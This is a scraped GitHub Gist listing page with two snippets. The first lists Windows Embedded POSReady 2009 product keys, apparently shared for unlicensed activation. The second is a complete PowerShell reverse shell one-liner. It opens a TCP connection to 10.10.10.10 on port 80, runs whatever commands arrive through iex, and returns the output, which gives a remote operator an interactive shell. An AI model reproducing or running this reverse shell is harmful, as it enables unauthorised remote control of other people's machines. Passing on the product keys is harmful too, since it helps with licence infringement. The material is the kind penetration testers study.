Skip to content

Instantly share code, notes, and snippets.

View ILPlais's full-sized avatar
👨‍🏫
In cyber-security training

PLAIS Lionel ILPlais

👨‍🏫
In cyber-security training
View GitHub Profile
@RaduTek
RaduTek / Windows Embedded POSready 2009.txt
Last active January 3, 2026 18:05
Windows Embedded Standard Product Keys
WEPOS2009 Full keys:
KGRMV-TWG8H-43Y2K-7PJBC-PM4CB (Unknown, OEM)
XM633-9YG7Y-47JM6-4QMF8-XPKYG (Unknown, OEM)
XPT4M-RKVC9-4YQWT-JJP76-RBXD3 (Full)
WEPOS2009 Other keys (might be Evaluation, don't use):
KFF8R-TMHF4-GKT2P-KGDHH-FXPMB
D4GQ7-HG48K-7YP6R-6JM4C-33FMQ
@egre55
egre55 / powershell_reverse_shell.ps1
Last active January 27, 2026 21:46
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()